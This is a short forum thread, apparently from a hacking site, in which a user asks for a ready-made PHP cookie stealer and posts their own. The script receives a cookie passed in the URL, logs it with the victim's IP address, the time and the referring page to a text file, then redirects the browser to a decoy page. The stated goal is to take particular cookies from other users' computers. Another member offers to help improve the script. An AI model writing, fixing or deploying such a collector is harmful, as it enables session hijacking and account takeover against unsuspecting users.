Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

cookie stealer in php?


ghost's Avatar
0 0

hey guys anyone know were i can get a pre scripted cookie stealer from? mine dont work:(

any help would be great thx:D


Mr_Cheese's Avatar
0 1

post what you have so far, and we can improve it


ghost's Avatar
0 0

Im now using IE and the script i have is for fire fox:( so i dont have anything:(


ghost's Avatar
0 0

This is the code i have now:(

<?php $cookie = $_GET['c']; $ip = getenv ('REMOTE_ADDR'); $date=date("j F, Y, g:i a");; $referer=getenv ('HTTP_REFERER'); $fp = fopen('cookies.txt', 'a'); fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>'); fclose($fp); header ("Location: /pic1542.html"); ?>

But what i want is a code to take cookies from a users computer and save them to my server, i want a sertain cookies, is this possible?

any help would be great thx:D

ahh dint know i had to disable smileys lol:D do now:D


ghost's Avatar
0 0

well thanx to a kick in the right direction from Grindordie i know what im doin now sort ov lol